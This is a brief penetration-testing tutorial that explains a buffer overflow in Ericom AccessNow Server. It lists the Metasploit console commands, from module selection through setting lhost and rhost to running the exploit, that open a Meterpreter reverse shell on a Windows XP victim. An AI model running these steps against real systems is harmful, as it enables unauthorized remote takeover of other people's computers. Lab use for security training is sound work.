Kali Linux, Penetration Testing

Hack Remote Windows PC using Ericom AccessNow Server Buffer Overflow

 This module exploits a stack based buffer overflow in Ericom AccessNow Server. The vulnerability is due to an insecure usage of vsprintf with user controlled data, which can be triggered with a malformed HTTP request. This module has been tested successfully with Ericom AccessNow Server on Windows XP SP3 and Windows 2003 Server SP2.

Exploit Targets

Ericom AccessNow Server


Attacker: kali Linux

Victim PC: Windows XP SP 3

Open Kali terminal type msfconsole

Now type use exploit/windows/http/ericom_access_now_bof

msf exploit (ericom_access_now_bof)>set payload windows/meterpreter/reverse_tcp

msf exploit (ericom_access_now_bof)>set lhost (IP of Local Host)

msf exploit (ericom_access_now_bof)>set rhost (IP of Remote PC)

msf exploit (ericom_access_now_bof)>exploit